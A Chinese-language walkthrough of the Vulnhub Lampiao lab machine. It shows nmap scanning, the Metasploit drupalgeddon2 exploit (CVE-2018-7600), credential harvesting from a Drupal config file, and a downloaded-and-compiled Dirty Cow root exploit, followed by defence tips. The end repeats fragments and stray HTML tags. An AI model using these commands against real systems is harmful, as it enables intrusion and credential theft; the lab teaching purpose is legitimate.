Vulnhub靶机Lampiao渗透测试教学文档<\/h1>

环境准备<\/h2>

靶机信息<\/h3>

名称: Lampiao<\/li>

下载链接:

大小: 669MB<\/li> <\/ul>

网络配置<\/h3>

攻击机(Kali Linux) IP: 10.10.10.128<\/li>

靶机IP: 10.10.10.129 (通过DHCP自动分配)<\/li> <\/ul>

渗透测试步骤<\/h2>

1. 主机发现<\/h3>

使用nmap进行主机扫描:<\/p>

nmap -sP 192.168.107.1\/24
<\/span><\/span><\/code><\/pre>确认靶机IP为10.10.10.129<\/p>
2. 端口扫描<\/h3>
初始扫描常用端口:<\/p>
nmap -sS 10.10.10.129
<\/span><\/span><\/code><\/pre>仅发现22端口开放，但SSH弱口令爆破未成功。<\/p>
全面扫描所有端口:<\/p>
nmap -p- 10.10.10.129
<\/span><\/span><\/code><\/pre>发现1898端口开放Web服务。<\/p>
3. Web服务枚举<\/h3>
访问http:\/\/10.10.10.129:1898进行信息收集<\/p>
目录扫描<\/h4>
使用御剑扫描工具发现:<\/p>

\/robots.txt<\/li>
\/CHANGELOG.txt<\/li>
<\/ul>
从CHANGELOG.txt确认网站使用Drupal 7.54框架<\/p>
4. 漏洞利用<\/h3>
搜索Drupal相关漏洞:<\/p>
msfconsole
<\/span><\/span>msf > search drupal
<\/span><\/span><\/code><\/pre>发现CVE-2018-7600远程代码执行漏洞<\/p>
使用Metasploit利用该漏洞:<\/p>
use exploit\/unix\/webapp\/drupal_drupalgeddon2
<\/span><\/span>set RHOSTS 10.10.10.129
<\/span><\/span>set RPORT 1898<\/span>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>成功获取www-data权限的shell<\/p>
5. 获取交互式shell<\/h3>
python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre>6. 信息收集与横向移动<\/h3>
在网站目录中发现可疑文件:<\/p>

audio.m4a: 提示用户tiago<\/li>
lampiao.jpg<\/li>
LuizGonzaga-LampiaoFalou.mp3<\/li>
qrc.png (扫描结果为鼓励信息)<\/li>
<\/ul>
在\/var\/www\/html\/sites\/default\/settings.php中发现数据库凭据:<\/p>

用户名: tiago<\/li>
密码: [从配置文件中获取]<\/li>
<\/ul>
尝试SSH登录tiago用户成功<\/p>
7. 数据库访问<\/h3>
发现MySQL root密码与tiago用户密码相同，成功访问MySQL:<\/p>
mysql -u root -p
<\/span><\/span><\/code><\/pre>查看drupal数据库获取网站用户信息<\/p>
8. 权限提升<\/h3>
内核提权<\/h4>
检查内核版本:<\/p>
uname -a
<\/span><\/span><\/code><\/pre>发现系统为Ubuntu 14.04.5 (2016年8月)，存在脏牛(Dirty Cow)漏洞(CVE-2016-5195)<\/p>
下载并编译漏洞利用代码:<\/p>
wget https:\/\/www.exploit-db.com\/download\/40847.cpp -O dirtycow.cpp
<\/span><\/span>g++ -Wall -pedantic -O2 -std=<\/span>c++11 -pthread -o dcow dirtycow.cpp -lutil
<\/span><\/span>.\/dcow -s
<\/span><\/span><\/code><\/pre>成功获取root权限<\/p>
9. 获取flag<\/h3>
cd \/root
<\/span><\/span>cat flag.txt
<\/span><\/span><\/code><\/pre>关键知识点总结<\/h2>


全面端口扫描<\/strong>：使用-p-<\/code>参数扫描所有65535个端口，避免遗漏非常规服务端口<\/p>
<\/li>

CMS漏洞利用<\/strong>：<\/p>

Drupal CVE-2018-7600远程代码执行漏洞<\/li>
使用Metasploit模块快速利用已知漏洞<\/li>
<\/ul>
<\/li>

权限提升技术<\/strong>：<\/p>

通过配置文件泄露获取数据库和系统凭据<\/li>
脏牛漏洞利用流程：下载→编译→执行<\/li>
内核漏洞利用条件：版本匹配+有编译环境<\/li>
<\/ul>
<\/li>

信息收集技巧<\/strong>：<\/p>

检查robots.txt和CHANGELOG.txt等标准文件<\/li>
分析网站配置文件获取敏感信息<\/li>
检查非常规文件(如音频、图片)中可能隐藏的线索<\/li>
<\/ul>
<\/li>

工具使用<\/strong>：<\/p>

nmap全面扫描<\/li>
Metasploit框架利用已知漏洞<\/li>
gcc编译本地提权利用代码<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

及时更新CMS系统和插件<\/li>
限制配置文件的访问权限<\/li>
使用最小权限原则运行服务<\/li>
定期更新操作系统内核<\/li>
监控非常规端口的开放情况<\/li>
避免在配置文件中硬编码敏感信息<\/li>
<\/ol>

Vulnhub靶机Lampiao渗透测试教学文档<\/h1>

环境准备<\/h2>

渗透测试步骤<\/h2>

3. Web服务枚举<\/h3> 访问http:\/\/10.10.10.129:1898进行信息收集<\/p>

8. 权限提升<\/h3>

防御建议<\/h2> 及时更新CMS系统和插件<\/li> 限制配置文件的访问权限<\/li> 使用最小权限原则运行服务<\/li> 定期更新操作系统内核<\/li> 监控非常规端口的开放情况<\/li> 避免在配置文件中硬编码敏感信息<\/li> <\/ol>

3. Web服务枚举<\/h3>
访问http:\/\/10.10.10.129:1898进行信息收集<\/p>

防御建议<\/h2>

及时更新CMS系统和插件<\/li>
限制配置文件的访问权限<\/li>
使用最小权限原则运行服务<\/li>
定期更新操作系统内核<\/li>
监控非常规端口的开放情况<\/li>
避免在配置文件中硬编码敏感信息<\/li> <\/ol>